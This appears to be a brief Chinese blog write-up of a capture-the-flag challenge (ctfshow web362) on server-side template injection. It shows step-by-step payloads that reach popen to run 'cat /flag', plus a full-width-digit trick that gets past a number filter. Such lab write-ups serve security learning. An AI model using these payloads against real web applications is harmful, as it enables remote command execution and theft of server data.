当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={
{"".__class__.__bases__[0].__subclasses__()}} 一直到这一步都是正常的
从12开始就没用了
数字出现了问题,看wp用全角数字代替正常数字绕过
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然后应该可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_62094846/article/details/124361669
边栏推荐
- Setting up keil environment of GD single chip microcomputer
- 由tcl脚本生成板子对应的vivado工程
- STM32 learning record 0008 - GPIO things 1
- Error reported when running tensorboard: valueerror: duplicate plugins for name projector, solution
- JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
- Kettle paoding jieniu Chapter 17 text file output
- Refcell in rust
- Rust: a simple example of TCP server and client
- Custom prompt box MessageBox in QT
- CISSP certified daily knowledge points (April 15, 2022)
猜你喜欢
CANopen STM32 transplantation
Robocode tutorial 8 - advanced robot
Nodejs安装
Robocode tutorial 3 - Robo machine analysis
硬核解析Promise對象(這七個必會的常用API和七個關鍵問題你都了解嗎?)
Dock installation redis
【ACM】376. Swing sequence
kettle庖丁解牛第17篇之文本文件输出
Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
QT add external font ttf
随机推荐
Daily network security certification test questions (April 14, 2022)
kettle庖丁解牛第17篇之文本文件输出
CANopen usage method and main parameters of object dictionary
Ionic instruction set order from creation to packaging
Solution to Chinese garbled code after reg file is imported into the registry
The vivado project corresponding to the board is generated by TCL script
Reptile efficiency improvement method
WiFi ap6212 driver transplantation and debugging analysis technical notes
CISSP certified daily knowledge points (April 14, 2022)
Resolve the error Max virtual memory areas VM max_ map_ count [65530] is too low, increase to at least [262144]
【ACM】376. 摆动序列
JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability
STM32 learning record 0008 - GPIO things 1
Robocode tutorial 7 - Radar locking
Daily CISSP certification common mistakes (April 18, 2022)
How to ensure the security of futures accounts online?
Use of regular expressions in QT
Connection mode of QT signal and slot connect() and the return value of emit
解决报错max virtual memory areas vm.max_map_count [65530] is too low, increase to at least [262144]
Vulnérabilité d'exécution de la commande de fond du panneau de commande JD - freefuck